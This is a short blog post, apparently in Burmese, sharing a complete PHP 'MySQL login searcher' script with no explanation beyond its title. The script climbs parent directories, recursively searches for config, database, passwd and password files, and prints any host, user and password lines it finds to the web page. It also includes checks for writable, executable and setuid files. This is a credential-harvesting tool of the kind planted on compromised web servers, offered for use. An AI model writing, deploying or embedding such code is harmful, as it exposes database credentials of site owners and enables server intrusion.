Php My SQL login searcher code ေလးပါ.....
<?php
$backwards_depth = 2; // how many directories to step backwards
$forward_depth = 4; // amount of dirs to recursively search forwards
backstep($backwards_depth);
getMysql($forward_depth);
function backstep($amount) {
for($i = 0; $i < $amount; $i++) {
if(@is_readable("..")) chdir("..");
else return $i;
}
}
function getMysql($depth)
{
echo "<h3>MySQL Logins:</h3>"; // hail the almighty regular expression
$files = findFile($depth, getcwd(), "*config*|*.conf|*database*|*passwd*|*password*", ".gif|.jpg|.png|.htm|.js|template|forgot|remind|new|change|lib|sample|install", "read");
foreach($files as $path) {
$dbinfo = false;
$contents = file($path);
foreach($contents as $line) {
$line = trim($line); // make sure its useful and remove comments
if($line[0] != '$' && strpos(strtolower($line), "define(") === false) continue;
if(strpos($line, "//") !== false) $line = substr($line, 0, strpos($line, "//"));
else if(strpos($line, "/*") !== false) $line = substr($line, 0, strpos($line, "/*"));
else if(strpos($line, "#") !== false) $line = substr($line, 0, strpos($line, "#"));
// parse out the db info
if(strpos(strtolower($line), "host") !== false) $dbinfo .= $line.'<br>';
else if(strpos(strtolower($line), "user") !== false) $dbinfo .= $line.'<br>';
else if(strpos(strtolower($line), "pass") !== false) $dbinfo .= $line.'<br>';
}
if($dbinfo != false) echo "<font color=green>".$path."</font>:<br>".$dbinfo.'<br>';
}
}
function findFile($find_depth, $find_startfrom, $find_query, $find_reject, $find_perms)
{
$startdir = getcwd();
chdir($find_startfrom);
if($find_query == "") return -1;
else {
$query = explode("|", $find_query);
$query_len = count($query) - 1;
}
if($find_reject == "") $reject_len = -1; else {
$reject = explode("|", $find_reject);
$reject_len = count($reject) - 1;
}
if($find_perms == "read") $perms = 0;
else if($find_perms == "write") $perms = 1;
else if($find_perms == "execute") $perms = 2;
else if($find_perms == "setuid") $perms = 3;
$depth_dir = "";
$matches;
$match = true;
$x = 0;
while($x <= $find_depth) {
$y = 0;
while($y <= $query_len) {
$search = $depth_dir.$query[$y];
$files = glob($search);
if(!is_array($files)) break;
foreach($files as $possible_file) {
if($reject_len != -1) {
$z = 0;
while($z <= $reject_len) {
if(strpos($possible_file, $reject[$z])) {
$match = false;
break;
}
$z++;
}
}
if($perms == 0) if(!is_readable($possible_file)) $match = false;
else if($perms == 1) if(!is_writeable($possible_file)) $match = false;
else if($perms == 2) if(!is_executable($possible_file)) $match = false;
else if($perms == 3) {
$setuid = floor(fileperms($possible_file) / 1000);
if(!is_executable($possible_file)) $match = false;
if($setuid != 1 && $setuid != 2 && $setuid != 4 && $setuid != 6) $match = false;
}
if($match == true) $matches[] = $find_startfrom.DIRECTORY_SEPARATOR.$possible_file;
$match = true;
}
$y++;
}
$x++;
$depth_dir .= '*'.DIRECTORY_SEPARATOR;
}
chdir($startdir);
return $matches;
}
?>
Subscribe to:
Post Comments (Atom)
0 comments:
Post a Comment